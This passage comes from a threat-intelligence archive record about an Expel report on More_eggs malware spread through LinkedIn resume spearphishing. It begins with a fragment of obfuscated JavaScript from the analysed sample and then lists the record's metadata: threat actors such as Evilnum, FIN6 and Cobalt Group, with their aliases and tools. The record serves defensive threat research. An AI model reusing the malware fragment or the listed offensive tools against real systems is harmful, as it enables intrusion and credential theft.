lgnsyjcm8, lgnsyjcm4));if (!lgnsyjcm4718) {return false;}return\r\nlgnsyjcm4718;} catch(lgnsyjcm0598){return false;}}function lgnsyjcm481(){var lgnsyjcm9032 = \"\\;var\r\nlgnsyjcm4797;var lgnsyjcm867;var lgnsyjcm337 = \"\"\"\";var lgnsyjcm118 = '\"\"';var lgnsyjcm449 = \"\"\"\";try\r\n{lgnsyjcm4797 = lgnsyjcm15(lgnsyjcm2656(lgnsyjcm737\r\nSource: https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing\r\nhttps://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing" ], "report_names": [ "more-eggs-and-some-linkedin-resume-spearphishing" ], "threat_actors": [ { "id": "059b16f8-d4e0-4399-9add-18101a2fd298", "created_at": "2022-10-25T15:50:23.29434Z", "updated_at": "2026-04-10T02:00:05.380938Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "Evilnum" ], "source_name": "MITRE:Evilnum", "tools": [ "More_eggs", "EVILNUM", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": "ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51", "created_at": "2022-10-25T16:07:23.474746Z", "updated_at": "2026-04-10T02:00:04.623746Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "ATK 67", "Cobalt Gang", "Cobalt Spider", "G0080", "Gold Kingswood", "Mule Libra", "TAG-CR3" ], "source_name": "ETDA:Cobalt Group", "tools": [ "ATMRipper", "ATMSpitter", "Agentemis", "AmmyyRAT", "AtNow", "COOLPANTS", "CobInt", "Cobalt Strike", "CobaltStrike", "Cyst Downloader", "Fareit", "FlawedAmmyy", "Formbook", "Little Pig", "Metasploit Stager", "Mimikatz", "More_eggs", "NSIS", "Nullsoft Scriptable Install System", "Pony Loader", "Ripper ATM", "SDelete", "Siplog", "SoftPerfect Network Scanner", "SpicyOmelette", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Terra Loader", "ThreatKit", "VenomKit", "cobeacon", "win.xloader" ], "source_id": "ETDA", "reports": null }, { "id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd", "created_at": "2023-01-06T13:46:39.153487Z", "updated_at": "2026-04-10T02:00:03.232006Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "EvilNum", "Jointworm", "KNOCKOUT SPIDER", "DeathStalker", "TA4563" ], "source_name": "MISPGALAXY:Evilnum", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "39ea99fb-1704-445d-b5cd-81e7c99d6012", "created_at": "2022-10-25T16:07:23.601894Z", "updated_at": "2026-04-10T02:00:04.684134Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "G0120", "Jointworm", "Operation Phantom in the [Command] Shell", "TA4563" ], "source_name": "ETDA:Evilnum", "tools": [ "Bypass-UAC", "Cardinal RAT", "ChromeCookiesView", "EVILNUM", "Evilnum", "IronPython", "LaZagne", "MailPassView", "More_eggs", "ProduKey", "PyVil", "PyVil RAT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraPreter", "TerraStealer", "TerraTV" ], "source_id": "ETDA", "reports": null }, { "id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242", "created_at": "2022-10-25T15:50:23.744036Z", "updated_at": "2026-04-10T02:00:05.294413Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "Cobalt Group", "GOLD KINGSWOOD", "Cobalt Gang", "Cobalt Spider" ], "source_name": "MITRE:Cobalt Group", "tools": [ "Mimikatz", "More_eggs", "SpicyOmelette", "SDelete", "Cobalt Strike", "PsExec" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434434, "ts_updated_at": 1775826779, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e37c923c835ff3e50c03111e63681c409ddb74c7.pdf", "text": "https://archive.orkl.eu/e37c923c835ff3e50c03111e63681c409ddb74c7.txt", "img": "https://archive.orkl.eu/e37c923c835ff3e50c03111e63681c409ddb74c7.jpg" } }